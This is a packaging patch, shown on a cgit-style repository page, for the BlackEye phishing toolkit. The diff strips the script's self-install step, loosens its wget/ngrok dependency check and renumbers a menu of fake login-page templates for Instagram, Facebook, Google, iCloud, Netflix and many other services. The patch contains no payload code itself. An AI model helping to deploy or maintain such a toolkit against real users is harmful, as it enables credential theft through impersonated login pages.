summarylogtreecommitdiffstats
path: root/blackeye.patch
blob: d3bed26dda1eb9f6befddf26c1db2d6c7f7942d1 (plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
diff -ru --color old/blackeye.sh new/blackeye.sh
--- old/blackeye.sh	2020-12-19 21:16:48.990415929 +0100
+++ new/blackeye.sh	2020-12-19 21:34:52.926612866 +0100
@@ -9,43 +9,25 @@
 # TrapControl
 trap 'printf "\n";stop;exit 1' 2
 
-# Ensure system knows where blackeye directory was installed.
-if [[ ! -f '~/.local/.be_dir' ]]; then
-  LDIR=$(pwd)
-  echo ${LDIR} > ~/.local/.be_dir
-fi
-
-# When launched if CLI is not in Blackeye directory it will change to where user has installed it.
-WDIR=$(cat ~/.local/.be_dir)
-cd ${WDIR}
-
-# Adds Blackeye to Path
-if [[ ! -f '/usr/sbin/blackeye' ]]; then
-  sudo cp blackeye.sh /usr/sbin/blackeye
-  sudo chmod +x /usr/sbin/blackeye
-  sudo chown $USER:$USER /usr/sbin/blackeye
-fi
-## Blackeye can now be started from anywhere by running 'blackeye'
-
 # Dependancy Check
 dependencies() {
   command -v php > /dev/null 2>&1 || { echo >&2 "I require php but it's not installed. Install it. Aborting."; exit 1; }
-  command -v wget > /dev/null 2>&1 || { echo >&2 "I require wget but it's not installed. Install it. Aborting."; exit 1; }
+  { command -v wget || command -v ngrok; } > /dev/null 2>&1 || { echo >&2 "I require either ngrok or wget but neither of them is installed. Install one of those. Aborting."; exit 1; }
   command -v unzip > /dev/null 2>&1 || { echo >&2 "I require unzip but it's not installed. Install it. Aborting."; exit 1; }
   command -v curl > /dev/null 2>&1 || { echo >&2 "I require curl but it's not installed. Install it. Aborting."; exit 1; }
 }
 
 # Option Menu
 menu(){
-  echo -e "          ${BC}01${AC} Instagram ${NC}       ${BC}17${AC} DropBox ${NC}        ${BC}33${AC} eBay ${NC}"
-  echo -e "          ${BC}02${AC} FaceBook ${NC}        ${BC}18${AC} Adobe ID ${NC}       ${BC}34${AC} Amazon ${NC}"
-  echo -e "          ${BC}03${AC} SnapChat ${NC}        ${BC}19${AC} Shopify ${NC}        ${BC}35${AC} iCloud ${NC}"
-  echo -e "          ${BC}04${AC} Twitter ${NC}         ${BC}20${AC} Messenger ${NC}      ${BC}36${AC} Spotify ${NC}"
-  echo -e "          ${BC}05${AC} Github ${NC}          ${BC}21${AC} GitLab ${NC}         ${BC}37${AC} Netflix ${NC}"
-  echo -e "          ${BC}06${AC} Google ${NC}          ${BC}22${AC} Twitch ${NC}         ${BC}38${AC} Custom ${NC}"
-  echo -e "          ${BC}07${AC} Origin ${NC}          ${BC}23${AC} MySpace ${NC}        ${BC}**${AC} Extra Tools ${NC}"
-  echo -e "          ${BC}08${AC} Yahoo ${NC}           ${BC}24${AC} Badoo ${NC}          ${BC}39${AC} CamPhish ${NC}"
-  echo -e "          ${BC}09${AC} LinkedIn ${NC}        ${BC}25${AC} VK ${NC}             ${BC}40${AC} LostPass ${NC}"
+  echo -e "          ${BC} 1${AC} Instagram ${NC}       ${BC}17${AC} DropBox ${NC}        ${BC}33${AC} eBay ${NC}"
+  echo -e "          ${BC} 2${AC} FaceBook ${NC}        ${BC}18${AC} Adobe ID ${NC}       ${BC}34${AC} Amazon ${NC}"
+  echo -e "          ${BC} 3${AC} SnapChat ${NC}        ${BC}19${AC} Shopify ${NC}        ${BC}35${AC} iCloud ${NC}"
+  echo -e "          ${BC} 4${AC} Twitter ${NC}         ${BC}20${AC} Messenger ${NC}      ${BC}36${AC} Spotify ${NC}"
+  echo -e "          ${BC} 5${AC} Github ${NC}          ${BC}21${AC} GitLab ${NC}         ${BC}37${AC} Netflix ${NC}"
+  echo -e "          ${BC} 6${AC} Google ${NC}          ${BC}22${AC} Twitch ${NC}         ${BC}38${AC} Custom ${NC}"
+  echo -e "          ${BC} 7${AC} Origin ${NC}          ${BC}23${AC} MySpace ${NC}        ${BC}**${AC} Extra Tools ${NC}"
+  echo -e "          ${BC} 8${AC} Yahoo ${NC}           ${BC}24${AC} Badoo ${NC}          ${BC}39${AC} CamPhish ${NC}"
+  echo -e "          ${BC} 9${AC} LinkedIn ${NC}        ${BC}25${AC} VK ${NC}             ${BC}40${AC} LostPass ${NC}"
   echo -e "          ${BC}10${AC} Protonmail ${NC}      ${BC}26${AC} Yandex ${NC}         ${BC}41${AC} PhishMailer ${NC}"
   echo -e "          ${BC}11${AC} Wordpress ${NC}       ${BC}27${AC} DevianART ${NC}      ${BC}42${AC} HackerPro ${NC}"
   echo -e "          ${BC}12${AC} Microsoft ${NC}       ${BC}28${AC} Wi-Fi ${NC}      "       #${BC}01${AC} ?? ${NC}
@@ -57,7 +39,7 @@
   read -p $'\n\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Choose an option: \e[0m\en' option
 
   # Ngrok Auth Validation
-  if [[ ! -f 'ngrok' ]]; then
+  if [[ ! -f 'ngrok' ]] && ! ln -s "$(type -P ngrok)" ./ 2>/dev/null; then
     wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
     unzip ngrok-stable-linux-amd64.zip
     rm ngrok-stable-linux-amd64.zip